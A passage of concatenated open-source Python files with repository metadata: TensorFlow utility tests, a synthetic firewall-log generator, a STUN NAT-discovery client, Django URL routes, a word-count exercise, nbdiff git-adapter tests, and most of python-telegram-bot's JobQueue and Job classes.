        # Save a checkpoint into y_dir first.
        with self.test_session() as sess:
            sess.run(tf.global_variables_initializer())
            normal_saver.save(sess, y_checkpoint_base, global_step=0)
        # Saver owns only x; y is restored from the fixed y_dir checkpoint.
        saver = experiment_utils.AsymmetricSaver(
            [x], [experiment_utils.RestoreSpec(
                [y], os.path.join(y_dir, 'model.ckpt-0'))])
        # Write an x checkpoint.
        with self.test_session() as sess:
            sess.run(tf.global_variables_initializer())
            x_initial, y_initial = sess.run([x, y])
            saver.save(sess, x_checkpoint_base)
        # Load using AsymmetricSaver.
        with self.test_session() as sess:
            sess.run(tf.global_variables_initializer())
            saver.restore(sess, tf.train.latest_checkpoint(x_dir))
            x_final, y_final = sess.run([x, y])
        # Make sure that x is loaded correctly from checkpoint, and that y
        # isn't.
        self.assertEqual(x_initial, x_final)
        self.assertNotAllClose(y_initial, y_final)
class FilterNormalizationTest(tf.test.TestCase):
    """Tests for normalize_all_filters()."""
    def test_basic(self):
        """Paired weights/biases share a norm; unpaired normalize alone; scalars untouched."""
        u = tf.get_variable('abcdef/weights', shape=[7, 5, 3, 2])
        v = tf.get_variable('abcdef/biases', shape=[2])
        w = tf.get_variable('unpaired/weights', shape=[7, 5, 3, 2])
        x = tf.get_variable('untouched', shape=[])
        normalize_ops = experiment_utils.normalize_all_filters(
            tf.trainable_variables())
        with self.test_session() as sess:
            sess.run(tf.global_variables_initializer())
            u_initial, v_initial, w_initial, x_initial = sess.run([u, v, w, x])
            sess.run(normalize_ops)
            u_final, v_final, w_final, x_final = sess.run([u, v, w, x])
        # Per-filter L2 norms over the first three axes.
        u_norms = np.sqrt(np.sum(np.square(u_initial), axis=(0, 1, 2)))
        w_norms = np.sqrt(np.sum(np.square(w_initial), axis=(0, 1, 2)))
        # We expect that the abcdef weights are normalized in pairs, that
        # the unpaired weights are normalized on their own, and the
        # untouched weights are in fact untouched.
        self.assertAllClose(np.array(u_final * u_norms), u_initial)
        self.assertAllClose(np.array(v_final * u_norms), v_initial)
        self.assertAllClose(np.array(w_final * w_norms), w_initial)
        self.assertAllClose(x_initial, x_final)
class AssignmentHelperTest(tf.test.TestCase):
    """Tests for AssignmentHelper flat-vector assign/retrieve round-tripping."""
    def test_basic(self):
        """A flat vector fills x (row-major) then y; z is not managed."""
        x = tf.get_variable('x', shape=[2, 3])
        y = tf.get_variable('y', shape=[4])
        tf.get_variable('z', shape=[5, 6])
        helper = experiment_utils.AssignmentHelper([x, y])
        with self.test_session() as sess:
            helper.assign(np.arange(10.0), sess)
            self.assertAllClose(sess.run(x),
                                [[0.0, 1.0, 2.0], [3.0, 4.0, 5.0]])
            self.assertAllClose(sess.run(y), [6.0, 7.0, 8.0, 9.0])
            self.assertAllClose(
                helper.retrieve(sess),
                [0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0])
# Delegate to the TensorFlow test runner when executed as a script.
if __name__ == '__main__':
    tf.test.main()
| google/spectral-density | tf/experiment_utils_test.py | Python | apache-2.0 | 3,931 | 0.005342 |
#!/usr/bin/python
'''
This script is used to generate a set of random-ish events to
simulate log data from a Juniper Netscreen FW. It was built
around using netcat to feed data into Flume for ingestion
into a Hadoop cluster.

Once you have Flume configured you would use the following
command to populate data:

./gen_events.py 2>&1 | nc 127.0.0.1 9999
'''
import random

from netaddr import *
from time import sleep

# IANA protocol numbers: 6 = TCP, 17 = UDP.
protocols = ['6', '17']
common_ports = ['20','21','22','23','25','80','109','110','119','143','156','161','389','443']
action_list = ['Deny', 'Accept', 'Drop', 'Reject']
src_network = IPNetwork('192.168.1.0/24')
dest_network = IPNetwork('172.35.0.0/16')

fo = open("replay_log.txt", "w")
try:
    # Emit events forever; the script is meant to be stopped with Ctrl-C.
    while True:
        protocol = random.choice(protocols)
        src_port = random.choice(common_ports)
        dest_port = random.choice(common_ports)
        action = random.choice(action_list)
        # Skip .0 (network address) in the source /24 range.
        src_ip = src_network[random.randint(1, 254)]
        dest_ip = dest_network[random.randint(1, 65535)]
        event = "192.168.1.3 Netscreen-FW1: NetScreen device_id=Netscreen-FW1 [Root]system-notification-00257(traffic): start_time=\"YYYY-MM-DD HH:MM:SS\" duration=0 policy_id=125 service=syslog proto=%s src zone=Untrust dst zone=Trust action=%s sent=0 rcvd=0 src=%s dst=%s src_port=%s dst_port=%s session_id=0" % (protocol, action, src_ip, dest_ip, src_port, dest_port)
        fo.write(event + "\n")
        fo.flush()  # keep the replay file current; the loop never exits normally
        print(event)
        sleep(0.3)
finally:
    # Previously unreachable: close the file even on KeyboardInterrupt.
    fo.close()
| jpacerqueira/jpac-flume-logs | generator/gen_events.py | Python | apache-2.0 | 1,662 | 0.015042 |
import struct, socket, time, logging
from gosh.config import STUN_SERVER, STUN_PORT, logger
from gosh import JsonSocket
#=============================================================================
# STUN Client
# ============================================================================
class StunClient(object):
    """NAT behavior discovery against a STUN-like JSON server.

    Works over TCP or UDP (chosen in __init__). mapping_behavior() and
    filtering_behavior() return small integer codes classifying the NAT;
    False signals a failed exchange.
    """
    ## defined protocol
    TCP='TCP'
    UDP='UDP'
    def __init__(self, pro):
        # TCP mode re-binds one local port per request (self.port); UDP mode
        # keeps a single socket alive instead (self.sock).
        self.tcp=False
        if pro == 'TCP':
            self.tcp = True
            self.port = None
        else:
            self.sock = None
    def NAT_Behavior_Discovery(self):
        """Run both tests; returns a (mapping, filtering) tuple of codes."""
        mapping = self.mapping_behavior()
        # Reset the transport state between the two test runs.
        if self.tcp:
            self.port = None
        elif self.sock:
            self.sock.close()
            self.sock = None
        # NOTE(review): filtering discovery is skipped (0) for TCP -- confirm.
        if self.tcp:
            filtering = 0
        else:
            filtering = self.filtering_behavior()
        if self.sock:
            self.sock.close()
            self.sock = None
        return mapping, filtering
    def CreateMessage(self, changeip=False, changeport=False):
        """Build a binding-request message dict with CHANGE-IP/PORT flags."""
        data = {}
        data["STUN-TYPE"] = 'BINDING_REQUEST'
        data["CHANGE-REQUEST"] = 'CHANGE-REQUEST'
        data["CHANGE-IP"] = changeip
        data["CHANGE-PORT"] = changeport
        return data
    def binding_request(self, server, port, request, mapping=False):
        """Send one binding request; returns the response dict or False."""
        udpconnect = False
        if self.tcp:
            # Fresh TCP socket per request, re-bound to the same local port
            # (SO_REUSEADDR) so the NAT sees a consistent source endpoint.
            self.sock = JsonSocket(JsonSocket.TCP)
            self.sock.set_reuseaddr()
            if self.port:
                self.sock.bind(self.port)
                logger.debug("binding_request: Bind on port %d" %self.port)
            else:
                self.port = self.sock.bind(0)
        else:
            if not self.sock:
                self.sock = JsonSocket(JsonSocket.UDP)
            if mapping:
                udpconnect = True
        self.sock.set_timeout(3)
        if self.sock.connect(server, port, udpconnect):
            self.sock.send_obj(request)
            try:
                data = self.sock.read_obj()
            except Exception, e:
                logger.debug("binding_request: %s" %e)
                return False
            self.local_addr = self.sock.getsockname()
            logger.debug("binding_request: Local address %s:%d" %self.local_addr)
            if self.tcp:
                self.sock.close()
            else:
                self.sock.set_timeout(None)
            # NOTE(review): a 'BINDING-RESPONSE' key is treated as failure --
            # presumably it marks an error reply; confirm against the server.
            if 'BINDING-RESPONSE' in data:
                return False
            return data
        return False
    def mapping_behavior(self):
        """Classify the NAT's mapping behavior.

        Returns 10 if the mapped address equals the local address (no NAT);
        1 if the mapping survives a server-IP change; 2 if it survives a
        server-port change as well; otherwise 3, refined to 4/5 over TCP
        when the allocated ports increase/decrease monotonically by small
        steps; False on a failed exchange.
        """
        message = self.CreateMessage()
        data = self.binding_request(STUN_SERVER, STUN_PORT, message, True)
        if not data:
            return False
        #=============================================
        # TEST I
        # ============================================
        logger.debug("mapping_behavior: TEST_I")
        LOCAL_ADDR = "%s:%d" % self.local_addr
        TEST_I = data['XOR-MAPPED-ADDRESS']
        logger.debug("mapping_behavior: Public IP %s"%TEST_I)
        OTHER_SERVER, OTHER_PORT = data['OTHER-ADDRESS'].split(":")
        if LOCAL_ADDR == TEST_I:
            return 10
        else:
            #=============================================
            # TEST II
            # ============================================
            logger.debug("mapping_behavior: TEST_II")
            message = self.CreateMessage()
            data = self.binding_request(OTHER_SERVER, STUN_PORT, message, True)
            if not data:
                return False
            TEST_II = data['XOR-MAPPED-ADDRESS']
            logger.debug("mapping_behavior: Public IP %s"%TEST_II)
            if TEST_I == TEST_II:
                return 1
            else:
                #=============================================
                # TEST III
                # ============================================
                logger.debug("mapping_behavior: TEST_III")
                message = self.CreateMessage()
                data = self.binding_request(OTHER_SERVER, int(OTHER_PORT), message, True)
                if not data:
                    return False
                TEST_III = data['XOR-MAPPED-ADDRESS']
                logger.debug("mapping_behavior: Public IP %s"%TEST_III)
                if TEST_II == TEST_III:
                    return 2
                else:
                    if self.tcp:
                        port1 = int(TEST_I.split(":")[1])
                        port2 = int(TEST_II.split(":")[1])
                        port3 = int(TEST_III.split(":")[1])
                        if abs(port2-port1) < 5 and abs(port3-port1) <5:
                            if port1 < port2 < port3:
                                return 4
                            elif port1 > port2 > port3:
                                return 5
                    return 3
    def filtering_behavior(self):
        """Classify the NAT's filtering behavior.

        Returns 1 if a reply arrives after asking the server to answer from
        a different IP and port, 2 if only a port change succeeds, else 3;
        False if the initial exchange fails.
        """
        #=============================================
        # TEST I
        # ============================================
        logger.debug("filtering_behavior: TEST_I")
        message = self.CreateMessage()
        data = self.binding_request(STUN_SERVER, STUN_PORT, message)
        if not data:
            return False
        #=============================================
        # TEST II
        # ============================================
        logger.debug("filtering_behavior: TEST_II")
        message = self.CreateMessage(changeip=True, changeport=True)
        data = self.binding_request(STUN_SERVER, STUN_PORT, message)
        if data:
            return 1
        else:
            logger.debug("filtering_behavior: TEST_III")
            #=============================================
            # TEST III
            # ============================================
            message = self.CreateMessage(changeip=False, changeport=True)
            data = self.binding_request(STUN_SERVER, STUN_PORT, message)
            if data:
                return 2
            else:
                return 3
| nthiep/global-ssh | gosh/stun.py | Python | agpl-3.0 | 4,914 | 0.037241 |
from django.conf.urls.defaults import *
from models import Entry, Tag
from django.views.generic.dates import ArchiveIndexView, DateDetailView
from django.views.generic import TemplateView
# URL routes for the news app (Django 1.3-era generic class-based views).
urlpatterns = patterns('',
    # Archive landing page: entries indexed by their publication date.
    url(r'^/?$', ArchiveIndexView.as_view(model=Entry, date_field="published_on"), name="news-main"),
    # Old slug-based detail route, kept for reference only:
#    url(r'^(?P<year>\d{4})/(?P<month>\d{1,2})/(?P<day>\d{1,2})/(?P<slug>[0-9A-Za-z-]+)/$', 'date_based.object_detail', dict(entry_dict, slug_field='slug', month_format='%m'),name="news-detail"),
    # Detail page for one entry, addressed by date plus primary key.
    url(r'^(?P<year>\d+)/(?P<month>[-\w]+)/(?P<day>\d+)/(?P<pk>\d+)/$',
        DateDetailView.as_view(model=Entry, date_field="published_on"),
        name="news_detail"),
    # Static "about" page rendered from a plain template.
    url(r'^about/$', TemplateView.as_view(template_name='news/about.html'), name='news-about'),
)
| underbluewaters/marinemap | lingcod/news/urls.py | Python | bsd-3-clause | 788 | 0.006345 |
from collections import OrderedDict
# Count word occurrences while remembering first-appearance order,
# then print the number of distinct words and their counts.
n = int(input())
counts = OrderedDict()
for _ in range(n):
    word = input().strip()
    if word in counts:
        counts[word] += 1
    else:
        counts[word] = 1
print(len(counts))
print(*counts.values())
| alexander-matsievsky/HackerRank | All_Domains/Python/Collections/word-order.py | Python | mit | 269 | 0 |
from nbdiff.adapter import git_adapter as g
from pretend import stub
def test_get_modified_notebooks_empty():
    # Pretend we are inside a git work tree, but git reports no modified
    # files at all: the adapter must return an empty list.
    def fake_check_output(cmd):
        if '--is-inside-work-tree' in cmd:
            return 'true\n'
        return ''
    g.subprocess = stub(check_output=fake_check_output)
    assert g.GitAdapter().get_modified_notebooks() == []
def test_get_modified_notebooks_deleted():
    # Modified notebooks whose file no longer exists on disk must be
    # dropped; only bar.ipynb "exists" below, so only it is returned.
    # Constructed before subprocess is stubbed, so __init__ must not
    # shell out.
    adapter = g.GitAdapter()
    def check_output_stub(cmd):
        # Fake git output: three notebooks plus one non-notebook (foo.txt)
        # reported as modified.
        if '--modified' in cmd:
            output = '''foo.ipynb
bar.ipynb
foo.txt
baz.ipynb
'''
            return output
        elif '--unmerged' in cmd:
            # NOTE(review): '{i}' is never substituted (no .format call), so
            # the stage column is the literal string '{i}' — presumably
            # intended to be stages 1-3; confirm the adapter ignores it here.
            return ''.join([
                '100755\thash\t{i}\tfoo.ipynb\n'
                for i in [1, 2, 3]
            ])
        elif '--is-inside-work-tree' in cmd:
            return 'true\n'
        elif '--show-toplevel' in cmd:
            return '/home/user/Documents'
    def popen(*args, **kwargs):
        # Any Popen call yields an empty stdout stream.
        return stub(stdout=stub(read=lambda: ""))
    g.open = lambda fname: stub(read=lambda: "")
    g.subprocess = stub(
        check_output=check_output_stub,
        PIPE='foo',
        Popen=popen,
    )
    # Simulate deletion: only paths containing 'bar.ipynb' exist on disk.
    g.os.path.exists = lambda path: 'bar.ipynb' in path
    result = adapter.get_modified_notebooks()
    assert result[0][2] == 'bar.ipynb'
    assert len(result) == 1
def test_get_modified_notebooks():
    # All modified notebooks exist on disk, so both .ipynb files are
    # returned and the non-notebook foo.txt is filtered out.
    adapter = g.GitAdapter()
    def check_output_stub(cmd):
        # Fake git output: three notebooks plus one non-notebook (foo.txt)
        # reported as modified.
        if '--modified' in cmd:
            output = '''foo.ipynb
bar.ipynb
foo.txt
baz.ipynb
'''
            return output
        elif '--unmerged' in cmd:
            # NOTE(review): '{i}' is never substituted (no .format call), so
            # the stage column is the literal string '{i}' — presumably
            # intended to be stages 1-3; confirm the adapter ignores it here.
            return ''.join([
                '100755\thash\t{i}\tfoo.ipynb\n'
                for i in [1, 2, 3]
            ])
        elif '--is-inside-work-tree' in cmd:
            return 'true\n'
        elif '--show-toplevel' in cmd:
            return '/home/user/Documents'
    def popen(*args, **kwargs):
        # Any Popen call yields an empty stdout stream.
        return stub(stdout=stub(read=lambda: ""))
    g.open = lambda fname: stub(read=lambda: "")
    g.subprocess = stub(
        check_output=check_output_stub,
        PIPE='foo',
        Popen=popen,
    )
    # Every reported path "exists" on disk.
    g.os.path.exists = lambda path: True
    result = adapter.get_modified_notebooks()
    assert result[0][2] == 'bar.ipynb'
    assert result[1][2] == 'baz.ipynb'
    assert len(result) == 2
def test_get_unmerged_notebooks_empty():
    # Inside a git work tree with no merge conflicts: the adapter must
    # report no unmerged notebooks.
    def fake_check_output(cmd):
        if '--is-inside-work-tree' in cmd:
            return 'true\n'
        return ''
    g.subprocess = stub(check_output=fake_check_output)
    assert g.GitAdapter().get_unmerged_notebooks() == []
def test_get_unmerged_notebooks():
    # Unmerged notebooks are returned with absolute paths (rooted at the
    # repo toplevel) and non-notebook files (foo.py) are filtered out.
    adapter = g.GitAdapter()
    def check_output_stub(cmd):
        # Fake `git ls-files --unmerged` output: mode, hash, stage, path.
        # Each conflicted file appears once per merge stage (1, 2, 3).
        # Fixed: the '{i}' placeholder was previously never substituted
        # (missing .format), leaving a literal '{i}' stage field.
        if '--unmerged' in cmd:
            f1 = ''.join([
                '100755\thash\t{i}\tfoo.ipynb\n'.format(i=i)
                for i in [1, 2, 3]
            ])
            f2 = ''.join([
                '100755\thash\t{i}\tbar.ipynb\n'.format(i=i)
                for i in [1, 2, 3]
            ])
            f3 = ''.join([
                '100755\thash\t{i}\tfoo.py\n'.format(i=i)
                for i in [1, 2, 3]
            ])
            return f1 + f2 + f3
        elif '--is-inside-work-tree' in cmd:
            return 'true\n'
        elif '--show-toplevel' in cmd:
            return '/home/user/Documents'
    def popen(*args, **kwargs):
        # Any Popen call yields an empty stdout stream.
        return stub(stdout=stub(read=lambda: ""))
    g.open = lambda fname: stub(read=lambda: "")
    g.subprocess = stub(
        check_output=check_output_stub,
        PIPE='foo',
        Popen=popen,
    )
    result = adapter.get_unmerged_notebooks()
    assert len(result) == 2
    assert result[0][3] == '/home/user/Documents/foo.ipynb'
    assert result[1][3] == '/home/user/Documents/bar.ipynb'
| tarmstrong/nbdiff | tests/test_git_adapter.py | Python | mit | 3,720 | 0 |
#!/usr/bin/env python
# flake8: noqa E501
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2017
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
"""This module contains the classes JobQueue and Job."""
import logging
import time
import warnings
import datetime
import weakref
from numbers import Number
from threading import Thread, Lock, Event
from queue import PriorityQueue, Empty
class Days(object):
    """Weekday constants, Monday == 0 through Sunday == 6."""
    (MON, TUE, WED, THU, FRI, SAT, SUN) = tuple(range(7))
    # Convenience tuple covering every weekday.
    EVERY_DAY = (MON, TUE, WED, THU, FRI, SAT, SUN)
class JobQueue(object):
    """This class allows you to periodically perform tasks with the bot.
    Attributes:
        queue (:obj:`PriorityQueue`): The queue that holds the Jobs.
        bot (:class:`telegram.Bot`): Bot that's send to the handlers.
    Args:
        bot (:class:`telegram.Bot`): The bot instance that should be passed to the jobs.
    Deprecated:
        prevent_autostart (:obj:`bool`, optional): Thread does not start during initialisation.
        Use `start` method instead.
    """
    def __init__(self, bot, prevent_autostart=None):
        if prevent_autostart is not None:
            warnings.warn("prevent_autostart is being deprecated, use `start` method instead.")
        self.queue = PriorityQueue()
        self.bot = bot
        self.logger = logging.getLogger(self.__class__.__name__)
        self.__start_lock = Lock()
        self.__next_peek_lock = Lock()  # to protect self._next_peek & self.__tick
        self.__tick = Event()
        self.__thread = None
        self._next_peek = None
        self._running = False
    def put(self, job, next_t=None):
        """Queue a new job.
        Note:
            This method is deprecated. Please use: :attr:`run_once`, :attr:`run_daily`
            or :attr:`run_repeating` instead.
        Args:
            job (:class:`telegram.ext.Job`): The ``Job`` instance representing the new job.
            next_t (:obj:`int` | :obj:`float` | :obj:`datetime.timedelta` | :obj:`datetime.datetime` | :obj:`datetime.time`, optional):
                Time in or at which the job should run for the first time. This parameter will
                be interpreted depending on its type.
                * :obj:`int` or :obj:`float` will be interpreted as "seconds from now" in which the
                  job should run.
                * :obj:`datetime.timedelta` will be interpreted as "time from now" in which the
                  job should run.
                * :obj:`datetime.datetime` will be interpreted as a specific date and time at
                  which the job should run.
                * :obj:`datetime.time` will be interpreted as a specific time at which the job
                  should run. This could be either today or, if the time has already passed,
                  tomorrow.
        """
        warnings.warn("'JobQueue.put' is being deprecated, use 'JobQueue.run_once', "
                      "'JobQueue.run_daily' or 'JobQueue.run_repeating' instead")
        if job.job_queue is None:
            job.job_queue = self
        self._put(job, next_t=next_t)
    def _put(self, job, next_t=None, last_t=None):
        # Normalise next_t to an absolute POSIX timestamp before queueing.
        if next_t is None:
            next_t = job.interval
            if next_t is None:
                raise ValueError('next_t is None')
        if isinstance(next_t, datetime.datetime):
            next_t = (next_t - datetime.datetime.now()).total_seconds()
        elif isinstance(next_t, datetime.time):
            next_datetime = datetime.datetime.combine(datetime.date.today(), next_t)
            # The given time of day already passed today: schedule tomorrow.
            if datetime.datetime.now().time() > next_t:
                next_datetime += datetime.timedelta(days=1)
            next_t = (next_datetime - datetime.datetime.now()).total_seconds()
        elif isinstance(next_t, datetime.timedelta):
            next_t = next_t.total_seconds()
        next_t += last_t or time.time()
        self.logger.debug('Putting job %s with t=%f', job.name, next_t)
        self.queue.put((next_t, job))
        # Wake up the loop if this job should be executed next
        self._set_next_peek(next_t)
    def run_once(self, callback, when, context=None, name=None):
        """Creates a new ``Job`` that runs once and adds it to the queue.
        Args:
            callback (:obj:`callable`): The callback function that should be executed by the new
                job. It should take ``bot, job`` as parameters, where ``job`` is the
                :class:`telegram.ext.Job` instance. It can be used to access it's
                ``job.context`` or change it to a repeating job.
            when (:obj:`int` | :obj:`float` | :obj:`datetime.timedelta` | :obj:`datetime.datetime` | :obj:`datetime.time`):
                Time in or at which the job should run. This parameter will be interpreted
                depending on its type.
                * :obj:`int` or :obj:`float` will be interpreted as "seconds from now" in which the
                  job should run.
                * :obj:`datetime.timedelta` will be interpreted as "time from now" in which the
                  job should run.
                * :obj:`datetime.datetime` will be interpreted as a specific date and time at
                  which the job should run.
                * :obj:`datetime.time` will be interpreted as a specific time of day at which the
                  job should run. This could be either today or, if the time has already passed,
                  tomorrow.
            context (:obj:`object`, optional): Additional data needed for the callback function.
                Can be accessed through ``job.context`` in the callback. Defaults to ``None``.
            name (:obj:`str`, optional): The name of the new job. Defaults to
                ``callback.__name__``.
        Returns:
            :class:`telegram.ext.Job`: The new ``Job`` instance that has been added to the job
            queue.
        """
        job = Job(callback, repeat=False, context=context, name=name, job_queue=self)
        self._put(job, next_t=when)
        return job
    def run_repeating(self, callback, interval, first=None, context=None, name=None):
        """Creates a new ``Job`` that runs once and adds it to the queue.
        Args:
            callback (:obj:`callable`): The callback function that should be executed by the new
                job. It should take ``bot, job`` as parameters, where ``job`` is the
                :class:`telegram.ext.Job` instance. It can be used to access it's
                ``Job.context`` or change it to a repeating job.
            interval (:obj:`int` | :obj:`float` | :obj:`datetime.timedelta`): The interval in which
                the job will run. If it is an :obj:`int` or a :obj:`float`, it will be interpreted
                as seconds.
            first (:obj:`int` | :obj:`float` | :obj:`datetime.timedelta` | :obj:`datetime.datetime` | :obj:`datetime.time`, optional):
                Time in or at which the job should run. This parameter will be interpreted
                depending on its type.
                * :obj:`int` or :obj:`float` will be interpreted as "seconds from now" in which the
                  job should run.
                * :obj:`datetime.timedelta` will be interpreted as "time from now" in which the
                  job should run.
                * :obj:`datetime.datetime` will be interpreted as a specific date and time at
                  which the job should run.
                * :obj:`datetime.time` will be interpreted as a specific time of day at which the
                  job should run. This could be either today or, if the time has already passed,
                  tomorrow.
                Defaults to ``interval``
            context (:obj:`object`, optional): Additional data needed for the callback function.
                Can be accessed through ``job.context`` in the callback. Defaults to ``None``.
            name (:obj:`str`, optional): The name of the new job. Defaults to
                ``callback.__name__``.
        Returns:
            :class:`telegram.ext.Job`: The new ``Job`` instance that has been added to the job
            queue.
        """
        job = Job(callback,
                  interval=interval,
                  repeat=True,
                  context=context,
                  name=name,
                  job_queue=self)
        self._put(job, next_t=first)
        return job
    def run_daily(self, callback, time, days=Days.EVERY_DAY, context=None, name=None):
        """Creates a new ``Job`` that runs once and adds it to the queue.
        Args:
            callback (:obj:`callable`): The callback function that should be executed by the new
                job. It should take ``bot, job`` as parameters, where ``job`` is the
                :class:`telegram.ext.Job` instance. It can be used to access it's ``Job.context``
                or change it to a repeating job.
            time (:obj:`datetime.time`): Time of day at which the job should run.
            days (Tuple[:obj:`int`], optional): Defines on which days of the week the job should
                run. Defaults to ``EVERY_DAY``
            context (:obj:`object`, optional): Additional data needed for the callback function.
                Can be accessed through ``job.context`` in the callback. Defaults to ``None``.
            name (:obj:`str`, optional): The name of the new job. Defaults to
                ``callback.__name__``.
        Returns:
            :class:`telegram.ext.Job`: The new ``Job`` instance that has been added to the job
            queue.
        """
        job = Job(callback,
                  interval=datetime.timedelta(days=1),
                  repeat=True,
                  days=days,
                  context=context,
                  name=name,
                  job_queue=self)
        self._put(job, next_t=time)
        return job
    def _set_next_peek(self, t):
        # """
        # Set next peek if not defined or `t` is before next peek.
        # In case the next peek was set, also trigger the `self.__tick` event.
        # """
        with self.__next_peek_lock:
            if not self._next_peek or self._next_peek > t:
                self._next_peek = t
                self.__tick.set()
    def tick(self):
        """Run all jobs that are due and re-enqueue them with their interval."""
        now = time.time()
        self.logger.debug('Ticking jobs with t=%f', now)
        while True:
            try:
                t, job = self.queue.get(False)
            except Empty:
                break
            self.logger.debug('Peeked at %s with t=%f', job.name, t)
            if t > now:
                # We can get here in two conditions:
                # 1. At the second or later pass of the while loop, after we've already
                #    processed the job(s) we were supposed to at this time.
                # 2. At the first iteration of the loop only if `self.put()` had triggered
                #    `self.__tick` because `self._next_peek` wasn't set
                self.logger.debug("Next task isn't due yet. Finished!")
                self.queue.put((t, job))
                self._set_next_peek(t)
                break
            if job.removed:
                self.logger.debug('Removing job %s', job.name)
                continue
            if job.enabled:
                try:
                    current_week_day = datetime.datetime.now().weekday()
                    if current_week_day in job.days:
                        self.logger.debug('Running job %s', job.name)
                        job.run(self.bot)
                # Catch Exception, not a bare ``except:``, so SystemExit and
                # KeyboardInterrupt can still propagate and stop the queue.
                except Exception:
                    self.logger.exception('An uncaught error was raised while executing job %s',
                                          job.name)
            else:
                self.logger.debug('Skipping disabled job %s', job.name)
            if job.repeat and not job.removed:
                self._put(job, last_t=t)
            else:
                self.logger.debug('Dropping non-repeating or removed job %s', job.name)
    def start(self):
        """Starts the job_queue thread."""
        self.__start_lock.acquire()
        if not self._running:
            self._running = True
            self.__start_lock.release()
            self.__thread = Thread(target=self._main_loop, name="job_queue")
            self.__thread.start()
            self.logger.debug('%s thread started', self.__class__.__name__)
        else:
            self.__start_lock.release()
    def _main_loop(self):
        """
        Thread target of thread ``job_queue``. Runs in background and performs ticks on the job
        queue.
        """
        while self._running:
            # self._next_peek may be (re)scheduled during self.tick() or self.put()
            with self.__next_peek_lock:
                tmout = self._next_peek - time.time() if self._next_peek else None
                self._next_peek = None
                self.__tick.clear()
            self.__tick.wait(tmout)
            # If we were woken up by self.stop(), just bail out
            if not self._running:
                break
            self.tick()
        self.logger.debug('%s thread stopped', self.__class__.__name__)
    def stop(self):
        """Stops the thread."""
        with self.__start_lock:
            self._running = False
        self.__tick.set()
        if self.__thread is not None:
            self.__thread.join()
    def jobs(self):
        """Returns a tuple of all jobs that are currently in the ``JobQueue``."""
        return tuple(job[1] for job in self.queue.queue if job)
class Job(object):
    """This class encapsulates a Job.
    Attributes:
        callback (:obj:`callable`): The callback function that should be executed by the new job.
        context (:obj:`object`): Optional. Additional data needed for the callback function.
        name (:obj:`str`): Optional. The name of the new job.
    Args:
        callback (:obj:`callable`): The callback function that should be executed by the new job.
            It should take ``bot, job`` as parameters, where ``job`` is the
            :class:`telegram.ext.Job` instance. It can be used to access it's :attr:`context`
            or change it to a repeating job.
        interval (:obj:`int` | :obj:`float` | :obj:`datetime.timedelta`, optional): The interval in
            which the job will run. If it is an :obj:`int` or a :obj:`float`, it will be
            interpreted as seconds. If you don't set this value, you must set :attr:`repeat` to
            ``False`` and specify :attr:`next_t` when you put the job into the job queue.
        repeat (:obj:`bool`, optional): If this job should be periodically execute its callback
            function (``True``) or only once (``False``). Defaults to ``True``.
        context (:obj:`object`, optional): Additional data needed for the callback function. Can be
            accessed through ``job.context`` in the callback. Defaults to ``None``.
        name (:obj:`str`, optional): The name of the new job. Defaults to ``callback.__name__``.
        days (Tuple[:obj:`int`], optional): Defines on which days of the week the job should run.
            Defaults to ``Days.EVERY_DAY``
        job_queue (class:`telegram.ext.JobQueue`, optional): The ``JobQueue`` this job belongs to.
            Only optional for backward compatibility with ``JobQueue.put()``.
    """
    def __init__(self,
                 callback,
                 interval=None,
                 repeat=True,
                 context=None,
                 days=Days.EVERY_DAY,
                 name=None,
                 job_queue=None):
        self.callback = callback
        self.context = context
        self.name = name or callback.__name__
        # _repeat must be initialised before the ``interval`` property is
        # assigned below, because the interval setter reads ``self.repeat``.
        self._repeat = repeat
        self._interval = None
        self.interval = interval  # property setter validates the type
        self.repeat = repeat  # property setter re-validates against interval
        self._days = None
        self.days = days  # property setter validates the weekday tuple
        # Weak proxy so a queued Job does not keep its JobQueue alive.
        self._job_queue = weakref.proxy(job_queue) if job_queue is not None else None
        # Events are used as thread-safe boolean flags for removal/enabling.
        self._remove = Event()
        self._enabled = Event()
        self._enabled.set()
    def run(self, bot):
        """Executes the callback function."""
        self.callback(bot, self)
    def schedule_removal(self):
        """
        Schedules this job for removal from the ``JobQueue``. It will be removed without executing
        its callback function again.
        """
        self._remove.set()
    @property
    def removed(self):
        """:obj:`bool`: Whether this job is due to be removed."""
        return self._remove.is_set()
    @property
    def enabled(self):
        """:obj:`bool`: Whether this job is enabled."""
        return self._enabled.is_set()
    @enabled.setter
    def enabled(self, status):
        if status:
            self._enabled.set()
        else:
            self._enabled.clear()
    @property
    def interval(self):
        """
        :obj:`int` | :obj:`float` | :obj:`datetime.timedelta`: Optional. The interval in which the
            job will run.
        """
        return self._interval
    @interval.setter
    def interval(self, interval):
        # A repeating job needs an interval to know when to run next.
        if interval is None and self.repeat:
            raise ValueError("The 'interval' can not be 'None' when 'repeat' is set to 'True'")
        if not (interval is None or isinstance(interval, (Number, datetime.timedelta))):
            raise ValueError("The 'interval' must be of type 'datetime.timedelta',"
                             " 'int' or 'float'")
        self._interval = interval
    @property
    def interval_seconds(self):
        """:obj:`int`: The interval for this job in seconds."""
        if isinstance(self.interval, datetime.timedelta):
            return self.interval.total_seconds()
        else:
            return self.interval
    @property
    def repeat(self):
        """:obj:`bool`: Optional. If this job should periodically execute its callback function."""
        return self._repeat
    @repeat.setter
    def repeat(self, repeat):
        if self.interval is None and repeat:
            raise ValueError("'repeat' can not be set to 'True' when no 'interval' is set")
        self._repeat = repeat
    @property
    def days(self):
        """Tuple[:obj:`int`]: Optional. Defines on which days of the week the job should run."""
        return self._days
    @days.setter
    def days(self, days):
        if not isinstance(days, tuple):
            raise ValueError("The 'days' argument should be of type 'tuple'")
        if not all(isinstance(day, int) for day in days):
            raise ValueError("The elements of the 'days' argument should be of type 'int'")
        if not all(0 <= day <= 6 for day in days):
            raise ValueError("The elements of the 'days' argument should be from 0 up to and "
                             "including 6")
        self._days = days
    @property
    def job_queue(self):
